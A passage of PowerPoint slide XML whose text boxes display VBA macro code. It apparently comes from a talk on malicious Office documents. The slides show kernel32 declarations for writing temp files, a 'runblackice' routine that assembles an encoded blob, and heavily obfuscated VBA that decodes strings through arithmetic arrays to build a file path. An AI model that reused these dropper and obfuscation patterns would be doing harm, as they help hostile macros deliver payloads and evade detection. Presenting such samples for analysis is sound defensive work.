              </a:rPr>
              <a:t>Private Declare Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Lib "kernel32"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hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lpBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Byte,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dwNumberOfBytesToWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lpNumberOfBytesWritten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long,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lpOverlapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long) As Long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Declare Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetTempPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Lib "kernel32" Alias "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetTempPathA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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nBufferLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long,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lpBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As String) As Long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Declare Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetTempFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Lib "kernel32" Alias "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetTempFileNameA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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lpPathName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As String,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lpPrefixString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As String,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uUnique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ByVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lpTempFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As String) As Long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>runblackice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>On Error Resume Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + "VwBvAHIAawBzAHAAYQBjAGUAIABTAHQAYQB0AGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAgECAAAABAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAABQAAAAAAABCAHIAbwB3AHMAZQByAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAACAAMAAAAHAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAFAAAAAAAAEUAZABpAHQAbwByAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAAAAAUAAAAAAAA"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115205" y="1363662"/>
            <a:ext cx="10820400" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1E1E1E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bupvupdyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>afpkh.ExpandEnvironmentStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pedugbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Array(240, (8405 - 8257), (-8353 + 8486), (4508 - 4375), (-4516 + 4661), (8215 _</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- 8067), (-221 + 350), (-8839 + 8987), (2865 - 2625), (5557 - 5420), 148, (-8210 + 8387), (-3782 + 3968), (-9105 + 9288), (-8111 + 8287), _</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>137, 148, (2515 - 2359), (5998 - 5863), 137, (-37 + 217), 175, 178, (-5460 + 5632), (-7127 + 7294), (-4668 + 4847), 189, (332 - 160), ( _</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-9117 + 9368), (-446 + 623), (2217 - 2037), (4051 - 3890)), (9832 - 9619)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scgzdrkmc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>byfivenf.CreateTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bupvupdyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Err.Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;&gt; (9752 - 9752) Then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ejuyjco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pkjhnpvxn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ejuyjco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pedugbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Array(), (-2644 + 2727))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pkjhnpvxn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Split(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bupvupdyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pedugbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Array((2924 - 2825)), (7128 - 7065)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wolfmy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UBound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pkjhnpvxn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If Mid(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bupvupdyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Len(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bupvupdyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>), (-1676 + 1677)) &lt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pedugbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Array((-2597 + 2849)), (-2010 + 2170)) Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wolfmy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wolfmy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - (-4391 _</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ 4392)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616075" y="1502161"/>
            <a:ext cx="10820400" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1E1E1E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LVRiDty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nsZIrFO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eZGZLMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TDAcru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kQBVrj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UwVihX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZwZbfW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>QsGoTb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrhxjI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xttVlQa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tRbpRPL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pRRbsEH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
